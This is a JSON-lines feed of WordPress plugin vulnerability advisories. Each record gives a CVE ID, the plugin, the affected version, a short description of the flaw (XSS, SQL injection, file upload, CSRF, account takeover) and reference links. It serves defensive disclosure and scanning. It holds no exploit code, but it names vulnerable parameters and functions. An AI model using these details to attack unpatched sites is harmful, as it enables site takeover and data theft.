{"CVE_ID":"CVE-2024-1653","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxUpdateFolderPosition in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the folder position of categories as well as update the metadata of other taxonomies.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45badd20-1ba8-44be-8a7c-2ce21261e208?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45badd20-1ba8-44be-8a7c-2ce21261e208?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6132","slug":"wp-pexels-free-stock-photos","versionImpact":"1.2.2","description":"The Pexels: Free Stock Photos plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'pexels_fsp_images_options_validate' function in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79dd492e-d4da-4209-83a8-d8059263ae92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79dd492e-d4da-4209-83a8-d8059263ae92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-pexels-free-stock-photos\\\/trunk\\\/settings.php#L239\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-pexels-free-stock-photos\\\/trunk\\\/settings.php#L239\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9209","slug":"search-analytics","versionImpact":"1.4.10","description":"The WP Search Analytics plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/275268d6-5b08-441d-9924-3c99682b27d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/275268d6-5b08-441d-9924-3c99682b27d4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/search-analytics\\\/tags\\\/1.4.9\\\/admin\\\/includes\\\/class.stats-table.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/search-analytics\\\/tags\\\/1.4.9\\\/admin\\\/includes\\\/class.stats-table.php#L153\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9184","slug":"sendpulse-web-push","versionImpact":"1.3.6","description":"The SendPulse Free Web Push plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3.6 due to incorrect use of the wp_kses_allowed_html function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74831bf8-0a30-4758-bfe6-5a5b4ee7ec24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74831bf8-0a30-4758-bfe6-5a5b4ee7ec24?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sendpulse-web-push\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sendpulse-web-push\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sendpulse-web-push\\\/trunk\\\/settings.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sendpulse-web-push\\\/trunk\\\/settings.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169899\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169899\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10187","slug":"mycred","versionImpact":"2.7.4","description":"The myCred \u2013 Loyalty Points and Rewards plugin for WordPress and WooCommerce \u2013 Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_link shortcode in all versions up to, and including, 2.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a081d4-443d-4b3b-8c89-9eb0e23c961e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a081d4-443d-4b3b-8c89-9eb0e23c961e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mycred\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mycred\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183178\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183178\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11914","slug":"attire-blocks","versionImpact":"1.9.5","description":"The Gutenberg Blocks and Page Layouts \u2013 Attire Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'attire-blocks\/post-carousel' block in all versions up to, and including, 1.9.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attire-blocks\\\/trunk\\\/blocks\\\/dynamic\\\/post-carousel\\\/index.php#L445\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attire-blocks\\\/trunk\\\/blocks\\\/dynamic\\\/post-carousel\\\/index.php#L445\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attire-blocks\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attire-blocks\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c7973be-cf39-4452-9e41-19d2e6aa5e97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c7973be-cf39-4452-9e41-19d2e6aa5e97?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12404","slug":"internal-link-shortcode","versionImpact":"1.1.0","description":"The CF Internal Link Shortcode plugin for WordPress is vulnerable to SQL Injection via the 'post_title' parameter in all versions up to, and including, 1.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/internal-link-shortcode\\\/trunk\\\/internal-link-shortcode.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/internal-link-shortcode\\\/trunk\\\/internal-link-shortcode.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1661bb28-e5b4-4319-84bb-6cbeac266147?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1661bb28-e5b4-4319-84bb-6cbeac266147?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13852","slug":"option-editor","description":"The Option Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing nonce validation on the plugin_page() function. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/option-editor\\\/trunk\\\/option-editor.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/option-editor\\\/trunk\\\/option-editor.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/option-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/option-editor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50adbe1d-9d79-4015-9e09-2166f97efc47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50adbe1d-9d79-4015-9e09-2166f97efc47?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2511","slug":"ahathat","versionImpact":"1.6","description":"The AHAthat Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ahathat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ahathat\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cde440a2-55f8-406a-b81b-919028f0e887?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cde440a2-55f8-406a-b81b-919028f0e887?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32202","slug":"insert-or-embed-articulate-content-into-wordpress","versionImpact":"4.3000000025","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Brian Batt - elearningfreak.com Insert or Embed Articulate Content into WordPress allows Upload a Web Shell to a Web Server. This issue affects Insert or Embed Articulate Content into WordPress: from n\/a through 4.3000000025.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/insert-or-embed-articulate-content-into-wordpress\\\/vulnerability\\\/wordpress-insert-or-embed-articulate-content-into-wordpress-plugin-4-3000000025-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/insert-or-embed-articulate-content-into-wordpress\\\/vulnerability\\\/wordpress-insert-or-embed-articulate-content-into-wordpress-plugin-4-3000000025-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3605","slug":"frontend-login-and-registration-blocks","versionImpact":"1.0.7","description":"The Frontend Login and Registration Blocks plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.7. This is due to the plugin not properly validating a user's identity prior to updating their details like email via the flr_blocks_user_settings_handle_ajax_callback() function. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-login-and-registration-blocks\\\/trunk\\\/inc\\\/class-flr-blocks-user-settings.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-login-and-registration-blocks\\\/trunk\\\/inc\\\/class-flr-blocks-user-settings.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c11668c-6dc3-4539-b2be-bf6528bed73e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c11668c-6dc3-4539-b2be-bf6528bed73e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5258","slug":"conference-scheduler","versionImpact":"2.5.1","description":"The Conference Scheduler plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018className\u2019 parameter in all versions up to, and including, 2.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/conference-scheduler\\\/trunk\\\/conf-scheduler.php#L1703\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/conference-scheduler\\\/trunk\\\/conf-scheduler.php#L1703\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316436\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316436\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/conference-scheduler\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/conference-scheduler\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d0a03e5-b09c-430d-aa65-8ef9e01cf241?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d0a03e5-b09c-430d-aa65-8ef9e01cf241?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6082","slug":"birth-chart-compatibility","versionImpact":"2.0","description":"The Birth Chart Compatibility plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.0. This is due to insufficient protection against directly accessing the plugin's index.php file, which causes an error exposing the full path. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/birth-chart-compatibility\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/birth-chart-compatibility\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/birth-chart-compatibility\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/birth-chart-compatibility\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4607dca0-d3b7-4fca-8f89-a0a739bd7551?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4607dca0-d3b7-4fca-8f89-a0a739bd7551?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1470","slug":"ecommerce-product-catalog","versionImpact":"3.3.8","description":"The eCommerce Product Catalog plugin for WordPress is vulnerable to Stored Cross-Site Scripting via some of its settings parameters in versions up to, and including, 3.3.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2881773\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/price\\\/price-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2881773\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/price\\\/price-settings.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26b7438e-438b-41eb-9458-2fba8ab1964d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26b7438e-438b-41eb-9458-2fba8ab1964d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0892","slug":"bizlibrary","versionImpact":"1.1","description":"The BizLibrary WordPress plugin through 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54150be5-a53f-4b94-8ce5-04e073e3ab1f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54150be5-a53f-4b94-8ce5-04e073e3ab1f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2289","slug":"wp-vertical-image-slider","versionImpact":"1.2.16","description":"The wordpress vertical image slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018search_term\u2019 parameter in versions up to, and including, 1.2.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9983364-9b52-4acc-91d4-b352c6d24d52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9983364-9b52-4acc-91d4-b352c6d24d52?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2824902%40wp-vertical-image-slider%2Ftags%2F1.2.16&new=2902084%40wp-vertical-image-slider%2Ftags%2F1.2.17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2824902%40wp-vertical-image-slider%2Ftags%2F1.2.16&new=2902084%40wp-vertical-image-slider%2Ftags%2F1.2.17\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4227","slug":"ark-wysiwyg-comment-editor","versionImpact":"2.15.6","description":"The ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d015eba-31dc-44cb-a051-4e95df782b75\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d015eba-31dc-44cb-a051-4e95df782b75\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1652","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxClearCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to clear categories.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/acccc6ae-553d-4ed5-8ba9-06a9061d725c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/acccc6ae-553d-4ed5-8ba9-06a9061d725c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1422","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.12","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the modal popup widget's effect setting in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ba28184-b5c3-4a5c-a376-29b3c6a2aa20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ba28184-b5c3-4a5c-a376-29b3c6a2aa20?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1048\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1048\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1062\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1062\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037925%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3031349%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037925%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3031349%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file26\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8363","slug":"share-this-image","versionImpact":"2.02","description":"The Share This Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's STI Buttons shortcode in all versions up to, and including, 2.02 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d01b6056-a38d-4a60-9cdc-68663aa2aed6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d01b6056-a38d-4a60-9cdc-68663aa2aed6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.02\\\/includes\\\/class-sti-shortcodes.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.02\\\/includes\\\/class-sti-shortcodes.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146524\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146524\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9018","slug":"wp-easy-gallery","versionImpact":"4.8.5","description":"The WP Easy Gallery \u2013 WordPress Gallery Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018key\u2019 parameter in all versions up to, and including, 4.8.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1c4c632-66f2-4987-b7da-048dbe4a3044?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1c4c632-66f2-4987-b7da-048dbe4a3044?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L866\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L866\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8920","slug":"fonto","versionImpact":"1.2.1","description":"The Fonto \u2013 Custom Web Fonts Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/358be91d-cb00-429b-a4ed-69bf81e4d19e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/358be91d-cb00-429b-a4ed-69bf81e4d19e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fonto\\\/trunk\\\/includes\\\/class-fonto.php#L373\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fonto\\\/trunk\\\/includes\\\/class-fonto.php#L373\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fonto\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fonto\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169936\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169936\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169936\\\/#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169936\\\/#file2\",\"refsource\":\"\",\"tags\":[]}]"}
